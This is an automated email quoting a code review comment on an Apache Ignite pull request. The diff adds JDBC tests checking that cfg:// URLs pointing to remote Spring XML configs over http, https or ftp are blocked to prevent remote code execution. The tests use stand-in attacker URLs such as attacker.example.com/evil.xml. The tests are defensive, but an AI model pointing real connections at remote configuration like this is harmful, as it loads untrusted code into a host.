zstan commented on code in PR #13221:
URL: https://github.com/apache/ignite/pull/13221#discussion_r3437006017
##########
modules/clients/src/test/java/org/apache/ignite/internal/jdbc2/JdbcConnectionSelfTest.java:
##########
@@ -296,4 +296,67 @@ public void testSqlHints() throws Exception {
assertTrue(((JdbcConnection)conn).skipReducerOnUpdate());
}
}
+
+ /**
+ * Test that JDBC cfg:// URL with remote HTTP location is blocked by
default to prevent RCE.
+ */
+ @Test
+ public void testRemoteHttpCfgUrlIsBlocked() {
+ final String url = CFG_URL_PREFIX +
"http://attacker.example.com/evil.xml";;
+
+ GridTestUtils.assertThrows(
+ log,
+ new Callable<Object>() {
+ @Override public Object call() throws Exception {
+ try (Connection conn = DriverManager.getConnection(url)) {
+ return conn;
+ }
+ }
+ },
+ SQLException.class,
+ "Remote Spring configuration URLs"
+ );
+ }
+
+ /**
+ * Test that JDBC cfg:// URL with remote HTTPS location is blocked by
default to prevent RCE.
+ */
+ @Test
+ public void testRemoteHttpsCfgUrlIsBlocked() {
+ final String url = CFG_URL_PREFIX +
"https://attacker.example.com/evil.xml";;
+
+ GridTestUtils.assertThrows(
+ log,
+ new Callable<Object>() {
+ @Override public Object call() throws Exception {
+ try (Connection conn = DriverManager.getConnection(url)) {
+ return conn;
+ }
+ }
+ },
+ SQLException.class,
+ "Remote Spring configuration URLs"
+ );
+ }
+
+ /**
+ * Test that JDBC cfg:// URL with FTP location is always blocked.
+ */
+ @Test
+ public void testFtpCfgUrlIsAlwaysBlocked() {
+ final String url = CFG_URL_PREFIX +
"ftp://attacker.example.com/evil.xml";;
Review Comment:
Lets reduce tests a bit ? Use for loop with List.of("ftp", "https", "http")
and "ftps" ?
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
